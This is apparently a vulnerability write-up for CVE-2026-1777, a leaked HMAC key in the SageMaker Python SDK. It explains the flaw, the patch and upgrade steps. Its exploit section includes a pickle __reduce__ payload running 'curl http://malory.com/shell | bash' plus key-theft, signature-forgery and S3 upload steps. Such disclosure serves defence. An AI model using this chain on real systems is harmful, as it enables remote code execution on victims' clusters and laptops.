CVE-2026-1777

SageMaker's Open Secret: How a Helper Function Became a Backdoor

Alon Barad
Software Engineer

Feb 3, 2026 · 6 min read

Executive Summary (TL;DR)

The SageMaker Python SDK passed its integrity secret key as a cleartext environment variable. Anyone with 'DescribeTrainingJob' permissions could read the key, forge malicious serialized objects, and execute code on the training cluster or the developer's laptop.

A critical design flaw in the Amazon SageMaker Python SDK allowed Remote Code Execution (RCE) via insecure handling of cryptographic secrets. The SDK's 'remote function' capability, designed to offload local Python code to AWS training clusters, used an HMAC integrity check to protect serialized payloads against tampering. However, the secret key for this check was transmitted as a cleartext environment variable, accessible via standard AWS APIs. This allowed attackers with moderate privileges to forge malicious pickle payloads, achieving code execution both on the AWS training infrastructure and, potentially, on the victim developer's local machine.

The Hook: Convenience at a Cost

In the world of MLOps, laziness is a virtue. The Amazon SageMaker Python SDK introduced a brilliant feature called the @remote decorator. Its promise was simple: write a function on your laptop, slap a decorator on it, and the SDK automatically serializes it, ships it to a massive GPU cluster in the cloud, runs it, and brings the results back to you. It's magic.
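
For readers who have not used it, the workflow looks roughly like the sketch below. The instance type and the function body are placeholders for illustration, not taken from any real project.

# Minimal sketch of the @remote workflow (instance type and body are placeholders).
from sagemaker.remote_function import remote

@remote(instance_type="ml.m5.xlarge")
def train(epochs: int) -> float:
    # This body is pickled, uploaded to S3, and executed on a SageMaker training
    # instance; the return value is serialized back and deserialized locally.
    return 0.1 * epochs  # stand-in for a real training loop

loss = train(epochs=10)  # transparently launches a training job and waits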

But as any security researcher knows, 'magic' usually involves pickle. Serializing code and executing it remotely is inherently dangerous. To make this 'safe', the AWS engineers implemented an integrity check. They didn't want just anyone modifying the code in transit (stored in S3) and having the training job execute it.

So, they decided to sign the payload using an HMAC (Hash-Based Message Authentication Code). Conceptually, this is the right move. You compute a keyed hash of the data with a secret key: if the data changes, or the signature wasn't produced with that key, verification fails. It’s like a wax seal on a letter. The problem wasn't the lock; it was where they left the key.
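
As a refresher, the mechanism itself is sound. Here is a minimal standard-library illustration of the idea (this is not SageMaker code):

# Minimal HMAC illustration using only the standard library (not SageMaker code).
import hashlib
import hmac

secret_key = b"shared-secret"
payload = b"serialized function bytes"

# Sender: compute a keyed digest over the payload.
signature = hmac.new(secret_key, payload, hashlib.sha256).hexdigest()

# Receiver: recompute with the same key and compare in constant time.
expected = hmac.new(secret_key, payload, hashlib.sha256).hexdigest()
assert hmac.compare_digest(signature, expected)  # fails if payload or key differ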

The Flaw: Secrets in Plain Sight

Here is the architectural blunder: The SDK generated a REMOTE_FUNCTION_SECRET_KEY to sign the pickled payload. This key needs to exist in two places: the client (your laptop) to sign the code, and the remote worker (the SageMaker container) to verify it.

To get the key into the container, the SDK passed it as an environment variable to the SageMaker Training Job. In the cloud world, this is the equivalent of taping your spare house key to the front door. Why? Because the AWS API DescribeTrainingJob returns the full configuration of a job, including its environment variables, in cleartext.

This meant that the 'secret' wasn't secret at all. Any user or role with sagemaker:DescribeTrainingJob permission—a very common, low-sensitivity permission often granted to developers, auditors, and CI/CD pipelines—could query the API, read the environment variables, and walk away with the HMAC key. The integrity check was reduced to security theater.
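
A hedged sketch of what that read looks like with boto3 follows; the job name and region are placeholders, and the point is simply that the Environment map comes back in the DescribeTrainingJob response.

# Sketch: reading the "secret" with nothing more than describe permissions.
import boto3

sm = boto3.client("sagemaker", region_name="us-east-1")  # placeholder region
resp = sm.describe_training_job(TrainingJobName="target-job-123")  # placeholder job

# The Environment map is returned in cleartext alongside the rest of the config.
print(resp.get("Environment", {}).get("REMOTE_FUNCTION_SECRET_KEY"))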

The Code: Autopsy of a Leak

Let's look at the implementation logic that caused this. In the vulnerable versions (SDK < 3.2.0), the serialization logic relied on Python's hmac library. The _perform_integrity_check function took the payload and a secret key, hashed them, and compared the result.
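
A simplified reconstruction of that check, based on the description above, looks like this; the function name comes from the SDK, but the body is a sketch rather than the verbatim source.

# Simplified reconstruction of the vulnerable check (not the verbatim SDK source).
import hashlib
import hmac

def _perform_integrity_check(expected_digest: str, secret_key: bytes, payload: bytes) -> None:
    actual_digest = hmac.new(secret_key, payload, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected_digest, actual_digest):
        raise RuntimeError("Integrity check for the serialized payload failed.")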

The real smoking gun was in how the job was configured. The SDK automatically injected the key into the environment:

# Vulnerable Logic (Pseudo-code representation)
import secrets
import boto3

sagemaker_client = boto3.client("sagemaker")

# A fresh key is generated per job to sign the pickled payload...
secret_key = secrets.token_hex(32)
# ...but it is then handed to the training job as a plain environment variable.
job_env = {
    'REMOTE_FUNCTION_SECRET_KEY': secret_key,  # <--- The leak
    'OTHER_VARS': '...'
}
sagemaker_client.create_training_job(
    Environment=job_env,  # exposed verbatim by DescribeTrainingJob
    ...
)

The fix, applied in commit fb0d789, is drastic. They didn't just hide the key; they deleted the concept of the key entirely. The engineers realized that there is no secure way to pass a shared secret through the control plane without setting up complex Key Management Service (KMS) logistics that would break the user experience.

The patch replaces the HMAC check with a simple SHA256 hash. Now, the SDK verifies that the file wasn't corrupted in transit, but it no longer cryptographically verifies the author. They shifted the security model from "Application Layer Integrity" to "Infrastructure Layer Access Control" (i.e., relying on S3 permissions).

# Patched Logic in serialization.py
# - hmac_key = os.environ.get("REMOTE_FUNCTION_SECRET_KEY")
# - if not hmac.compare_digest(digest, actual_digest):
# + digest = hashlib.sha256(data).hexdigest()
# + if digest != actual_digest:
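
In plain terms, the post-patch check reduces to something like the following sketch of the described behavior (not the actual serialization.py):

# Sketch of the post-patch behavior: detects corruption, not tampering.
import hashlib

def verify_not_corrupted(expected_digest: str, payload: bytes) -> None:
    digest = hashlib.sha256(payload).hexdigest()
    if digest != expected_digest:
        raise RuntimeError("Payload corrupted in transit.")
    # Anyone who can overwrite both the payload and its recorded digest in S3
    # can still substitute arbitrary code; S3 access control is the real gate.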

The Exploit: From API Read to RCE

This vulnerability offers a textbook "Pivot" scenario. We start with Read access and escalate to Remote Code Execution. Here is how an attacker, let's call him "Malory", exploits this.

Step 1: Reconnaissance

Malory has access to the AWS CLI. He lists training jobs and describes one that looks active or recently completed:

aws sagemaker describe-training-job --training-job-name target-job-123

In the JSON output, buried under Environment, he finds: "REMOTE_FUNCTION_SECRET_KEY": "deadbeef1234..."

Step 2: Weaponization

Malory creates a Python script using the pickle module. He defines a class with a __reduce__ method that executes a reverse shell when deserialized.

import pickle
import os

class Malicious(object):
    def __reduce__(self):
        # __reduce__ runs at unpickling time: os.system fetches and runs the shell.
        return (os.system, ('curl http://malory.com/shell | bash',))

payload = pickle.dumps(Malicious())

Step 3: Signing the Bomb

Using the stolen key deadbeef1234..., Malory calculates the HMAC-SHA256 of his payload. He updates the metadata.json file associated with the job to include this new, valid signature.
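
Conceptually, the forgery step looks like the sketch below. The metadata file name and field name are assumptions for illustration rather than confirmed SDK internals, and the key value is the truncated placeholder from Step 1.

# Sketch: forging a valid signature with the stolen key.
import hashlib
import hmac
import json

# Assumes the pickled payload from Step 2 was saved to payload.pkl.
with open("payload.pkl", "rb") as f:
    payload = f.read()

stolen_key = bytes.fromhex("deadbeef1234")  # truncated placeholder from Step 1
forged_digest = hmac.new(stolen_key, payload, hashlib.sha256).hexdigest()

# The metadata file name and field name are illustrative assumptions.
with open("metadata.json", "w") as f:
    json.dump({"sha256_hash": forged_digest}, f)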

Step 4: Delivery

Malory uploads his poisoned payload.pkl and metadata.json to the S3 bucket defined in the training job's output path. He needs s3:PutObject permission for this, but if the bucket is shared or permissions are lax (common in data science orgs), this is trivial.
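
A minimal sketch of the delivery step with boto3; the bucket name and key prefix are placeholders, since the real values come from the job's configured S3 output paths.

# Sketch: planting the forged artifacts. Bucket and prefix are placeholders.
import boto3

s3 = boto3.client("s3")
bucket = "victim-sagemaker-bucket"
prefix = "target-job-123/results"

s3.upload_file("payload.pkl", bucket, f"{prefix}/payload.pkl")
s3.upload_file("metadata.json", bucket, f"{prefix}/metadata.json")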

Step 5: Detonation

This is the nasty part. The code executes in two possible places:

  1. The Server: If the training job is still initializing, the SageMaker container pulls the payload, verifies the signature (it matches!), deserializes it, and the cluster is compromised.
  2. The Client (Worse): If the job is finished, the unsuspecting data scientist runs job.result() on their laptop. The SDK pulls the (now malicious) artifacts from S3, verifies the signature, unpickles the data, and boom: Malory now has a shell on the developer's laptop inside the corporate VPN. A sketch of this client-side path follows below.
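
On the client side, the trigger is as mundane as fetching results. Here is a minimal sketch using the SDK's RemoteExecutor API; the function, instance type, and constructor arguments are placeholders rather than a real project's code.

# Sketch of the victim's side: fetching results deserializes whatever is in S3.
from sagemaker.remote_function import RemoteExecutor

def train(epochs: int) -> float:
    return 0.1 * epochs  # stand-in for real work

with RemoteExecutor(instance_type="ml.m5.xlarge") as executor:
    future = executor.submit(train, epochs=10)
    # On vulnerable versions, result() downloads the job's S3 artifacts, accepts
    # the forged HMAC, and unpickles attacker-controlled bytes on the laptop.
    result = future.result()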

The Impact: Breaking the Trust Boundary

The severity of CVE-2026-1777 lies in the trust boundary violation. Developers treat SageMaker as a trusted execution environment. They assume that artifacts created by their own jobs are safe. This vulnerability inverts that trust.

By compromising the integrity mechanism, an attacker turns the SageMaker SDK into a lateral movement tool. Access to S3 and DescribeTrainingJob is usually considered "Data Plane" access, not "Admin" access. However, via this exploit chain, those permissions are elevated to arbitrary code execution on any machine that interacts with that job.

Furthermore, because the secret was exposed in an API response, any tooling that captures full API responses, from CloudTrail-integrated SIEMs to third-party monitoring agents, may have recorded it, meaning the keys to the kingdom might be sitting in your Splunk logs right now.

The Fix: A Hard Reset

Amazon's response was swift and decisive. They didn't try to patch the leak; they removed the pipe. By eliminating the REMOTE_FUNCTION_SECRET_KEY entirely, they acknowledged that the environment variable transmission vector was fundamentally unsafe for high-value secrets in this context.

How to patch: Update your sagemaker Python package immediately.

  • For V3 users: Upgrade to >= 3.2.0
  • For V2 users: Upgrade to >= 2.256.0

Post-Patch Reality: With the HMAC gone, the SDK now relies solely on S3 bucket policies. This means if an attacker can write to your S3 bucket, they can replace the code, and the SDK will happily execute it (checking only a simple SHA hash for corruption, not tampering). Therefore, S3 Write permissions are now effectively equivalent to RCE permissions for SageMaker users. Audit your bucket policies accordingly.
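
As a starting point for that audit, the sketch below flags bucket-policy statements that grant write access to a SageMaker bucket; the bucket name is a placeholder, and a complete review also needs to cover IAM identity policies.

# Sketch: flag bucket-policy statements that grant write access (placeholder bucket).
import json
import boto3
from botocore.exceptions import ClientError

s3 = boto3.client("s3")
bucket = "sagemaker-us-east-1-123456789012"  # placeholder default bucket name

try:
    policy = json.loads(s3.get_bucket_policy(Bucket=bucket)["Policy"])
except ClientError as err:
    if err.response["Error"]["Code"] != "NoSuchBucketPolicy":
        raise
    policy = {"Statement": []}  # no bucket policy; IAM identity policies govern access

for stmt in policy["Statement"]:
    actions = stmt.get("Action", [])
    actions = [actions] if isinstance(actions, str) else actions
    # Post-patch, any principal that can PutObject here can effectively execute code.
    if any(a in ("s3:PutObject", "s3:*", "*") for a in actions):
        print("Review write grant:", json.dumps(stmt))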


Technical Appendix

CVSS Score
7.2 / 10
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Affected Systems

  • Amazon SageMaker Python SDK (v2 < 2.256.0)
  • Amazon SageMaker Python SDK (v3 < 3.2.0)
  • MLOps pipelines utilizing the @remote decorator

Affected Versions Detail

Product      Vendor                 Affected Versions    Fixed Version
sagemaker    Amazon Web Services    < 3.2.0              3.2.0
sagemaker    Amazon Web Services    < 2.256.0            2.256.0
Attribute         Detail
CWE ID            CWE-312 (Cleartext Storage of Sensitive Information)
Attack Vector     Network (API & S3)
CVSS v3.1         7.2 (High)
Impact            Remote Code Execution (RCE)
Authentication    Required (AWS IAM)
Exploit Status    PoC Possible (Logic is public)
CWE-312
Cleartext Storage of Sensitive Information

The application stores sensitive information in cleartext within a resource that might be accessible to another control sphere.

Vulnerability Timeline

  • 2025-12-15: Fix Commits Pushed
  • 2025-12-18: Version 3.2.0 Released
  • 2026-02-02: Public Disclosure
